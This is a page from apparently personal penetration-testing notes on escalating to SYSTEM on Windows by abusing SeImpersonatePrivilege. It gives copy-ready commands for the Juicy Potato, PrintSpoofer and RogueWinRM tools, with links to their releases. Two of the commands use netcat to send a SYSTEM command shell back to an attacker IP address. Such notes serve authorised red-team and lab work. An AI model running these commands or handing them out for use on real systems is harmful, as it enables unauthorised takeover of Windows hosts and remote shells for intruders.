🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  • Juicy Potato
  • RoguePotato
  • PrintSpoofer
  • RogueWinRM
  1. Windows
  2. Privilege Escalation

SeImpersonatePrivilege

If you have this permission you are most likely a service account and you will %99 end up as NT Authority/System

PreviousSeBackupPrivilegeNextSeDebugPrivilege

Last updated 2 years ago

If the operating system version is <= windows server 2016 use Juicy Potato else use PrintSpoofer

Juicy Potato

Pick one CLSID from here according to your system

Download the Juicy Potato binary from here

C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}

RoguePotato

I have never played with this one but should work in most of the cases

PrintSpoofer

.\PrintSpoofer.exe -i -c cmd

.\PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"

RogueWinRM

.\RogueWinRM.exe -p C:\windows\system32\cmd.exe

.\RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"

https://github.com/ohpe/juicy-potato/tree/master/CLSID
https://github.com/ohpe/juicy-potato/releases
https://github.com/antonioCoco/RoguePotato
https://github.com/antonioCoco/RoguePotato/releases/tag/1.0
https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
https://github.com/itm4n/PrintSpoofer
https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
https://github.com/antonioCoco/RogueWinRM
https://github.com/antonioCoco/RogueWinRM/releases/tag/1.1